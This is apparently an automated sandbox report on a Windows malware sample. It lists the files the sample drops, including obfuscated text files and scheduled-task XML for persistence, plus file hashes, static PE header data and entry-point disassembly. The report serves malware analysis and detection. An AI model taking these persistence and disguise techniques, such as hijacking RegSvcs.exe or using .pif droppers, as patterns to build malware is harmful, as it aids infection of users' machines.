        SSDEEP:12:0VE7CIEcVHdUb8rmhaUMixFfbkNTAbyecENQQxTrHLf2Fg:0VmVCcm88cvdQxqFg
        MD5:A412CE7422B902168C9D9D0069B2BD73
        SHA1:5ACE613E2FE2D8DE9A78825ACA7EF6C8DB271885
        SHA-256:63F1F9AA632314FE0177F06317530365AACAF728C21DC03A208E1109B5784E1D
        SHA-512:42A9CE52EED8DA9E756FEA877C25F70D4CB92E5B9B13FFF7D15446A0AE68381E25B8E1FBB022701CFEDFB100F8045FA584E851D6DEE32E9AA7219140BEB450F1
        Malicious:false
        Reputation:unknown
        Preview: 9B6o76o7HZ7GD73943Bu9pj47R06jJC0l8mH52ZEdXn2023i577t20651p6LW..9K3j6036LvSz0T61321U52S2V2s9j0g163n5A6374O7p7DK5u41390jm62v6zQX5m03eW6Y9bA72N08N66b1ywF9vLR7l9YCS3f..17wQN48d09F83h16ges4917847Mi8pYx2IHN79e8184qdkae4RIOu6I00vQ3j7zuQ72l4KY4u27uBH0l50Mv09FT9t..eoGvgM7766Z86iR77GH253ASV8158e9rvB583..284Y1k846C4A24c6CjV53Q13F2Z7Q11Gf5930a168JZ9285v60RY8IL0c45ci0Cl1y62wD1bH7gL6Dcb7817Dn6579o48C3ka60056GKh58X9k31N0115701Om481O2s22h7j1DDq..320h06Mhvbvx7TN47lwO7t5o48CK16R1D5oqVk92WkkF7i1J140Dg5y8T8U287C4sv4v70Q6Z2rZI34p5L986leOF666Ch4ts36TO1Fgfw..
        C:\Users\user\77066510\omrq.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):518
        Entropy (8bit):5.498311572387548
        Encrypted:false
        SSDEEP:12:xFFdWUIP+oniolYaDrJTCzj/cb4yvcnN0IxtXhelY2EaGiZ:xFFYJT2CJTCzj/biwtxtYlYaZ
        MD5:A0421E014197E3AB334AC3588A5E91A1
        SHA1:BAF987222C5925251A6567528E797FD63CAB3A92
        SHA-256:D27CDAFD99E19C474BC1BFC89334DD828C9089E44B0D3E043D3F0EAF2950F6EC
        SHA-512:411C0994EDEE07DF1F3140F85504C4F08534D41C3B6DF1502732491CBD5931D7597A7B08072986D6E5709B0817FF3384FB0E71F684274244875A6B1B46A122C2
        Malicious:false
        Reputation:unknown
        Preview: 6w48PegnK941ic7PHZcf0r1NP5..76ifu6842f61B7590D4I1AZWSA27pcAc7gGZ5w065h3oo6ukzQlvaLo1P8g2b77m181U1X3bO6ntm1n7u3R20B052AN210En2Vl58..Rv351f2y7641Q666jp012mb3k9jN3psg10kj679Im5865hm010eX52Lng089K431q3D9p9vA6567j71..82Y41S4810Z723G58qZUD2zxWZkX4ehRu240j4aic0oL1E5o27hQWj5H0f3QqLU7V7..X6vc0k95F6T9E0A84ttwQ59FQadq8d1Oauoke82Luv2U31p87V22U7gN500x921707l8504D4oL470jKTX03C82gP8615fJQ8lMH4G9GC3vMdrf1C86rf9057988863623nm5etj72LHg46Hch7xV2us77Vq..ZgO5X4500TAo1c0GP67t9Zz9t9k5641522aAWV4n5D67z0FmxW6aEC6H5Yne029b21V071is3Z6F26..
        C:\Users\user\77066510\psrsdcrs.ppt
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):535
        Entropy (8bit):5.460228697655972
        Encrypted:false
        SSDEEP:12:qmPLn4doIG2hU8Q9O1gOT98GsoYE3WMIvteVVx2i8:qmiG2Cn9O1gOTyQYIs+m
        MD5:06617F07B96ACD92F7B97E6968FE12C1
        SHA1:A5651BBA9A8F5B7BF7BBD579E5CAA790C81518FD
        SHA-256:D9CF772CBDB83A3DBA9EE767AC14BF1CCFE30FFFD41121EBB01C6D4D4799F792
        SHA-512:A4137B9F09A467218388A7272859B438B45C65BC3DA9DDDBB2FD5822DFA676C567C5ED3D4F30F6F334DB9578B8D8EE8CCA9E2405485D941CBB0242AD2BAAB599
        Malicious:false
        Reputation:unknown
        Preview: 0i87hcn7zq38Ud0M6O..7e15N4eJ3K5X1aJu25V8zYH6hv08uX1Tl39KJk5Dbt9G0S1s5ljav7Z47V9094006655j4b5Hl3Kt328479TsS6y34pB6LmzzVdOX6DT7B9D0tdFs069532nx7xK30jPG538nOo5I1fZ776Ma98n46rxUh8QeyJ21lM3Cv027K2110O7iH640y441544B0..sZvj9C5I0244v9BcC8568Hp549jHoiF4061V6R8K46Yph334a1C378O878rP0S186B02X6UB25896J1yT..7lh13r84g3zpSg2wR570v9pKs20ALzWa2439jDm67689DY99IqB6..n236g95825254793218230Br45e6bD2871PuAIaFS11I880e9MRlZ6wqY6K9099qn27JD822..124g48r34433f2C6Pj420GAnT0M0CNW6237J4gz4d26dWFH43i00N0335A3Io1x4A12x60Zjv85nlROSEU6ZLt51i96tH0X3r29FwZs20i29tE..
        C:\Users\user\77066510\rlller.xml
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):532
        Entropy (8bit):5.494842699274943
        Encrypted:false
        SSDEEP:12:Ih0PfU2+AQOW9QR3wU4uWavcRAI/7umzYVxBmUXOuC:FtQ59Q4HaIAczYVxBZC
        MD5:03818248A8B6BAAB709E4957BE26D1A6
        SHA1:77221C21787284A0891AAD0F918046E6EA8D209E
        SHA-256:D6825227D0376E6F9704C6213D61B3E324473CBB44987CEBB645D7458D8A1322
        SHA-512:C74D82DE930B544C9E1D6C51CF6C56FE3640D23C1C39B0A6FF4F0924EA905A093C85943C6002454558CB43E76558CE5773375D124809B62C39D2BDEC1B7C35C0
        Malicious:false
        Reputation:unknown
        Preview: u8N053k31p6j04MT87Q69ij9Y9EF94WV..ji3v3gt0282dZ2Gw1H2s55U4047ec0y1..c8T1E8Z183E68D50XASx26481t28I7gE6TLr16328O91YT3hKTji9sr35hpWeN9mvYvS29M2123D3699V532F5517wD45h9884Z0I80F..02VK5U80q8P6Wm4Z73tk2R77CTOtIEPLj0U5m50KUL65qqs4WYbI0DGT019p3Uht504Hn9C6833x1fZ228eNM..Y0jP62js65265W24Og96Z19Q9U8sfnIc6zr5Mf91qtwVX1MUQ7z2049Nq28K276dvjg73gl0R0e4Zp8K81r226JC4cAW2cK2Gj79m0B9eY9560nvo399G7o6QCiHrcfQ3rP762O7972c7P1zIKGL7o299..VS25TV1L5Tn4725Bp81m7v0oqDB642Z0FsU58d4LR4LHtc66692sM39inGE6Y35i0v78TVvxq24r693pCNK657vn5Q3QRd917159Zs7US6RbuVb59V..
        C:\Users\user\77066510\tcodw.xls
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):595
        Entropy (8bit):5.491533496757466
        Encrypted:false
        SSDEEP:12:UJhER91CU87mCTa/V0TDZ0vOjWrMNltukGSAtP6gv5xLTsyaUt:ChI1C75TBefMNltbUTvvLTXa8
        MD5:026F110A0C817D206247DAABE85734B6
        SHA1:F7A4A3054513E2BC1E3DE9F4AD628E642BD0965E
        SHA-256:478020C98C3533DDBE747DC2285F4B9743BC5C3476C53D28CBC1E10A861CCD71
        SHA-512:E5A65B33A297B5C58226E0DFEF7B30E3A4F440BAE0FADB7EECADC968B3CCECB3D26A7F43208BAC1AFCFCA5F9F775A855EA677EC87516FC378F6B363006C2BDCC
        Malicious:false
        Reputation:unknown
        Preview: f7sO4yc6zm04pV5JL2quHc8e9T0C22BqPv21F5N746705..074Oq3bpPRGYa3l86905Y0T544F527Fbl59U06q..a6Tl488L9bQhe7ih3C2YT06w235R0G6u7l950873f1000Y3T6IU7LfyjhT8a672E625B6P4f14H15g6F683D6XuZ1hTT8M27O8..14S18JaNArK515zH53770n7fW27xWuvUHxXI8M39N7e1yN77P78Qy8e6dog8262jil..1rSJ7KLCB5zC9u87UggY962B39U24rU11bmnBuSHC93C29042K..697S57s1z00b139B1L081zwC1..a74R17v1O08BB7pVg58c02053H93h95GM34107VO01j25..T66ozm13411vL6iUX34bk037Bn35WLyf303j442FQFQ16S25h9h8B54BQ4Zc79607JH1X201Mz4KMQE4znmFC72j9U6u7tD7BO093W3B..XH8jBlY4xk4rTv8F207s7Ei81bM35P635o1g2962q66PCjgESH75341o0vifI1OLB4U116shk6FU1ctxvC60735x6VK5c0pdqAi9ei586..
        C:\Users\user\77066510\tstvjpwaw.ico
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):522
        Entropy (8bit):5.487676269826994
        Encrypted:false
        SSDEEP:12:3VuARexgiBiiM1Yc1NUAgaJRXYcLS184svKxiXkHFymlE4X:jReWiBiimy+zYd1EUdX
        MD5:7E48DF6BAA951ECAE39B524CF001FCCA
        SHA1:454836998D2510CF79377EA16077922CC5AB2C13
        SHA-256:6AA7A35C0628AAFB3851BE715525F94323972C5B468E70FA9E77C98A17893ED1
        SHA-512:F56C16D18C3B9FB9F7F2421E66103E1D7A901F1C9160480C732AA303A29F71CE040B0A90DDEDAD68F210FC9A2ABF50CE9A4AF15112796D73EA97817A1984712E
        Malicious:false
        Reputation:unknown
        Preview: O9E6963gB9N6aN1Nid2wW67R5z9dM799v9SV3cD8qy57k6z3d7MUHGH1F35RdQ1c1p12C..CH43X5q99yA4Y816C07NKAf63TfsJ09..C51iuMERi8xMX53pwoKd8gl9866s47oS1i42435YhQC33Zmn8b26SV6bEvk850Qb5x8467K8QdP92l37zS3OB46Qi98w47r3W6Px028t9K1Li7vKxS23F3xg..e54kX0nz77Gdj5y46SOqe7602jhWMR51253641Va121251r7b94V369w0gz21k9llU8J1110Y..3i7vAoK08316V5227N824VsS0Dm165DTTj926I2F124833ftC4TtX1570h88400Wz66951q5541O0Td4Hk683Fv61jSCHHy8A83Z..w1WQ6S0pV0TZh6BYGIr663Lj54eK6613M3dB6qJ0npq6Ec555RezV680EvF84p8QKG20Yj6S28..3m2bR0079106p0IiC629m398186yZ2v4yXn37T11n..
        C:\Users\user\77066510\txoxpdjc.qnr
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:data
        Category:dropped
        Size (bytes):96502020
        Entropy (8bit):7.090532095529658
        Encrypted:false
        SSDEEP:98304:mnLDOE6//KHPJqqs2C7sIJ1+UdhsPQ36hX7jWcW3b3Mr0O1dElqhA1GJNkAL84Oh:3
        MD5:A6B5973B2AB8621E18DE5325194D4217
        SHA1:AE4F38F9D99FE7CAA0DFD1A8C20F9A8645C1AD19
        SHA-256:9F205B1613138A4CEB7942223C7654D575062ECB54D3CF54CDF1BB3E56BC2A6E
        SHA-512:938CD33CDC47F8BF9E588C9C2D4D9DF17C3866D69CD44527F08003CC1F50A96BDDDE7AD268D4FF3B5CDDEBAEAC44C9A888433172D5747B3AB419283D57414BE6
        Malicious:false
        Reputation:unknown
        Preview: ..;.=.....w.d]M.7.(......{uS......#.c.s...@..M...IMU..*[D.;..dx...1....J..$....Rv....o.$Vx....q.d+.[...._.@J.+.......8.8.V.k.X.b.1.O.6.t.4.U.6.4.X.8.0.s.y.0.J.p.b.J.r.E.3.6.U.9.r.2.E.3.f.Q.M.W.O.9.6.a.....9.a.K.0.1.O.a.4.8.6.a.X.2.3.K.F.8.N.7.c.5.4.V.3.g.9.Q.S.w.f.0.8.f.1.0........>..X..U...D.M..uy...er:.H..p......u..(Z@.yDU,...P....y..L.o8..w..g..@1.&%..S..]e.K.E.:..G$......9.Z...bMo.fHVo?..,.}...#......#2;.A..V.>.zg]...A..G..v.^~..|....l....3.2.1.2.4.Q.s.M.S.f.n.....W9qRk.M....2o.R.T.~.q..<..$D.R...O-.Wc.m..B........m...xo.}..$...S.2.?s...A5.9.....<.O.s..k..}.....W.5...... ..e.a...^7q^py.F9.+.$ef..4.xO...n......EQ.#..)[.-......qcO...+.!V6H...GYd.we./...I......<.......f.G1q...G..\X;.+n.)h.....-.tL.J.O.[........j^M..J..o...!.W.a..ug.Z.J.d........1..wZ$.y..P..Y...W.u.&.........z,.gD9.f.1.*./....3...mdq..y.Y...^.....*q...U.'..T.xh.!l&n.{#.v.._......N....LD......N........F.1...}u/.9.u.S..2."8#./.3..^.Vw......\..,!-dr7.p.."....P.KD..%.j..`.#..(..._f..Z
        C:\Users\user\77066510\vdxnbnfvi.pdf
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):571
        Entropy (8bit):5.496370279162565
        Encrypted:false
        SSDEEP:
        MD5:F35202D8C9FD1328ACF1397B5D6E9BF8
        SHA1:8F86894D08EF2AF26E3A3B4EAD2FBB4135FFB2AB
        SHA-256:5E088E5B883EB50CF8BB1820B6003D8B82DA35969DEB5A9BA8F606AB1E5F6DF6
        SHA-512:3C53300A425281738AEB6DF03D6B20E59A7BBF10B7695D8A8B2C91F9FA428D48F874DA546E9D78F65D55CD0ACE5E6225F00DDBD7A993FACD2131F6F9391513C7
        Malicious:false
        Reputation:unknown
        Preview: R3PxX43qOZ6h9N0tl61tRS1zgm5613195k971wU9yt9H869R52Jo00jJ2aQm4l7KOBp5F0kp54PX23R1237A1LYF5cJ48Xs07Ru96QA5395KEm338f6tO2U1A2h7i117Ux669wC8C3V94822mdor4p1mk..545F8uK74aqb377nRXmA4831jfo04K6jFIu110Hs6Ff2S8120424079q6z70mx24zq09911IDpt1..B8ipPqOgkg67Fj70492GPqSzm3MwKM0i9URKN73p5jtO49M4ZB4g623z9xY7dq490X20fEv23w1uy9CB6Nws4Aw317xhfSbV95BLN..KOt86Zqzh435E0W1R4c69uc9K2us56T7bq0Gv3L52AK2k038ONG7K17WQ2725Y..4078A0..x4ZCb29C800F227t9ou94GAg876eV4tQP2iUQPW1n..Nylcy1k2MW7..9405528E76s1L72oN539h5W29z6H4f33V4cc6JQZN8xc4M263371R0359511Vv91BYO9xvY8916fS8zzj4L423915mB9BQ66L8fjzf385..
        C:\Users\user\77066510\xfjtfdxub.cpl
        Process:C:\Users\user\Desktop\dUzAkYsvl8.exe
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):546
        Entropy (8bit):5.4988646271397466
        Encrypted:false
        SSDEEP:
        MD5:F04CA2A967FC764A36FAA9308CF33F48
        SHA1:A5C2DDB13912B1C5EF46B0BDDA7CC76031377CC9
        SHA-256:9343D1C8FF4B8D5D2B9FDA129AC44AA61F7B07BC5681C68088B997EDE440CFEA
        SHA-512:7B324450F41166AB33C26466DC8BFBAD1C84AE8B66CE38FF8C37ABD365A083738B3E8E9D1E5F05D68514B071321B29D45ED6E7D2009D4B13EF27F7876E937D0C
        Malicious:false
        Reputation:unknown
        Preview: M493C155X97O876a58tcFb29B51297QOnbu322ar50o2q0Qqt6b2Nw7e117I05m2Qn38F06yYOl98..gc19QC66as81v853Wz6456Yp4lwI7x1LPo7W6tIyM63u2Av050gIn32444T76..2cxJ7214JH9077dH92Mf18N6m4x1g86v3w9vGa9383T3sxqaV471e1WAa68de8qb36Hd57RGLHRf5TuuQXjAEXK319C6300Y2Fu9l248e13Px2fiOVBz0Y2749h0hJ27Mw0587Jhz9LlVww7uK24pPlr2x5j32XY43xc104WLgqw66t1H6W348cYg0xm5A..822zg47hKqnh43Ss94E4BB9Km2yaX23vz472M9b34r2Fb42Yj336R2Yi6z11N9097032p9dq1z955uCq76oLg28t..6Q36fg0a4yJ8plKm9e80Np01H66S2WZ8Zu140lS50fe8A98V79V8ejnC3NX7mf3437c19614l0j570OV751HLZk40m6STWSOT9dS80Np0E2a98wY18Z9Z6b3..
        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):142
        Entropy (8bit):5.090621108356562
        Encrypted:false
        SSDEEP:
        MD5:8C0458BB9EA02D50565175E38D577E35
        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
        Malicious:false
        Reputation:unknown
        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
        Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):142
        Entropy (8bit):5.090621108356562
        Encrypted:false
        SSDEEP:
        MD5:8C0458BB9EA02D50565175E38D577E35
        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
        Malicious:false
        Reputation:unknown
        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Temp\tmp1EC2.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1320
        Entropy (8bit):5.135668813522653
        Encrypted:false
        SSDEEP:
        MD5:8CAD1B41587CED0F1E74396794F31D58
        SHA1:11054BF74FCF5E8E412768035E4DAE43AA7B710F
        SHA-256:3086D914F6B23268F8A12CB1A05516CD5465C2577E1D1E449F1B45C8E5E8F83C
        SHA-512:99C2EF89029DE51A866DF932841684B7FC912DF21E10E2DD0D09E400203BBDC6CBA6319A31780B7BF8B286D2CEA8EA3FC7D084348BF2F002AB4F5A34218CCBEF
        Malicious:true
        Reputation:unknown
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Local\Temp\tmp2720.tmp
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):1310
        Entropy (8bit):5.109425792877704
        Encrypted:false
        SSDEEP:
        MD5:5C2F41CFC6F988C859DA7D727AC2B62A
        SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
        SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
        SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
        Malicious:false
        Reputation:unknown
        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:Non-ISO extended-ASCII text, with no line terminators
        Category:dropped
        Size (bytes):8
        Entropy (8bit):3.0
        Encrypted:false
        SSDEEP:
        MD5:F6112EADAC856DAAE9732D589993F43F
        SHA1:0DE653A9EA324DC51954C5FA1E58331AC7B8038C
        SHA-256:AD578EF8FC5B61D19BB496C0720C05E1FEF5D5B5EA8EBC40390D3D4C336DC4F8
        SHA-512:184F1EDB675AE8829090176439A63AA69E9CCF1B7040BD23938EFD3C6245C5DDAF019442F8D567E71CB4D9BB5E50DE74E0536121817E36C0C2E7D7670D8C6CAF
        Malicious:true
        Reputation:unknown
        Preview: .s.5A..H
        C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):57
        Entropy (8bit):4.830795005765378
        Encrypted:false
        SSDEEP:
        MD5:08E799E8E9B4FDA648F2500A40A11933
        SHA1:AC76B5E20DED247803448A2F586731ED7D84B9F3
        SHA-256:D46E34924067EB071D1F031C0BC015F4B711EDCE64D8AE00F24F29E73ECB71DB
        SHA-512:5C5701A86156D573BE274E73615FD6236AC89630714863A4CB2639EEC8EC1BE746839EBF8A9AEBA0A9BE326AF6FA02D8F9BD7A93D3FFB139BADE945572DF5FE9
        Malicious:false
        Reputation:unknown
        Preview: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        C:\Users\user\temp\hrennftnds.cpl
        Process:C:\Users\user\77066510\cjlaro.pif
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):82
        Entropy (8bit):5.0087305542018905
        Encrypted:false
        SSDEEP:
        MD5:EC8A6D0D840B97981D8DA9935499D168
        SHA1:002DCDC5B737749AEAC14B1B1F50DC83B05429AA
        SHA-256:2A33D572C8D852E5B135B7AC9F521FCF1E8CA030DEAF672594C180A7845017FC
        SHA-512:17D47FA260D6C06B9106EEDD92759B99DDFB3DF417D070B9BC28CB84FCCB69F258B350C5249D428595057AED972588D29558606B9611D43319B97736015E2201
        Malicious:false
        Reputation:unknown
        Preview: [S3tt!ng]..stpth=%userprofile%..Key=Chrome..Dir3ctory=77066510..ExE_c=cjlaro.pif..
        \Device\ConDrv
        Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:dropped
        Size (bytes):215
        Entropy (8bit):4.911407397013505
        Encrypted:false
        SSDEEP:
        MD5:623152A30E4F18810EB8E046163DB399
        SHA1:5D640A976A0544E2DDA22E9DF362F455A05CFF2A
        SHA-256:4CA51BAF6F994B93FE9E1FDA754A4AE74277360C750C04B630DA3DEC33E65FEA
        SHA-512:1AD53476A05769502FF0BCA9E042273237804B63873B0D5E0613936B91766A444FCA600FD68AFB1EF2EA2973242CF1A0FF617522D719F2FA63DF074E118F370B
        Malicious:false
        Reputation:unknown
        Preview: Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved......The following installation error occurred:..1: Assembly not found: '0'...

        Static File Info

        General

        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.823508667946661
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:dUzAkYsvl8.exe
        File size:1021780
        MD5:9a4a8643db95a8c0fe52af8675a5d1b1
        SHA1:c6beb75cbc168f9224ace74c0dcfb29df6197e82
        SHA256:b4e2d864ec03943310548bfbc963a0848bd08e088429c5ce05759face5d380d2
        SHA512:05d404c9422c2da367135f616a8b61b6adc68dc3f8f0b3a070f2071ec01de8c2aeafe5a63aea6e306fdfd299c43ef792efcfd9b555dcda9b3ff9e44872a8b4c0
        SSDEEP:24576:rAOcZEh5lwWkAZ5HrNUWTq6ai0bagi7vzJV:tWWbL1Tq6d4a5vT
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'..

        File Icon

        Icon Hash:b491b4ecd336fb5b

        Static PE Info

        General

        Entrypoint:0x41e1f9
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Time Stamp:0x5E7C7DC7 [Thu Mar 26 10:02:47 2020 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:1
        File Version Major:5
        File Version Minor:1
        Subsystem Version Major:5
        Subsystem Version Minor:1
        Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

        Entrypoint Preview

        Instruction
        call 00007F5150A9319Fh
        jmp 00007F5150A92B93h
        cmp ecx, dword ptr [0043D668h]
        jne 00007F5150A92D05h
        ret
        jmp 00007F5150A93315h
        ret
        and dword ptr [ecx+04h], 00000000h
        mov eax, ecx
        and dword ptr [ecx+08h], 00000000h
        mov dword ptr [ecx+04h], 00433068h
        mov dword ptr [ecx], 00434284h
        ret
        push ebp
        mov ebp, esp
        push esi
        push dword ptr [ebp+08h]
        mov esi, ecx
        call 00007F5150A86111h
        mov dword ptr [esi], 00434290h
        mov eax, esi
        pop esi
        pop ebp
        retn 0004h
        and dword ptr [ecx+04h], 00000000h
        mov eax, ecx
        and dword ptr [ecx+08h], 00000000h
        mov dword ptr [ecx+04h], 00434298h
        mov dword ptr [ecx], 00434290h
        ret
        lea eax, dword ptr [ecx+04h]
        mov dword ptr [ecx], 00434278h
        push eax
        call 00007F5150A95EADh
        pop ecx
        ret
        push ebp
        mov ebp, esp
        push esi
        mov esi, ecx
        lea eax, dword ptr [esi+04h]
        mov dword ptr [esi], 00434278h
        push eax
        call 00007F5150A95E96h
        test byte ptr [ebp+08h], 00000001h
        pop ecx
        je 00007F5150A92D0Ch
        push 0000000Ch
        push esi
        call 00007F5150A922CFh
        pop ecx
        pop ecx
        mov eax, esi
        pop esi
        pop ebp
        retn 0004h
        push ebp
        mov ebp, esp
        sub esp, 0Ch
        lea ecx, dword ptr [ebp-0Ch]
        call 00007F5150A92C6Eh
        push 0043A410h
        lea eax, dword ptr [ebp-0Ch]
        push eax
        call 00007F5150A95595h
        int3
        push ebp
        mov ebp, esp
        sub esp, 0Ch

        Rich Headers

        Programming Language:
        • [ C ] VS2008 SP1 build 30729
        • [EXP] VS2015 UPD3.1 build 24215
        • [LNK] VS2015 UPD3.1 build 24215
        • [IMP] VS2008 SP1 build 30729
        • [C++] VS2015 UPD3.1 build 24215
        • [RES] VS2015 UPD3 build 24213

        Data Directories

        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x3b5400x34.rdata
        IMAGE_DIRECTORY_ENTRY_IMPORT0x3b5740x3c.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x4c28.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x210c.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x397d00x54.rdata
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x342180x40.rdata
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x320000x260.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3aaec0x120.rdata
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
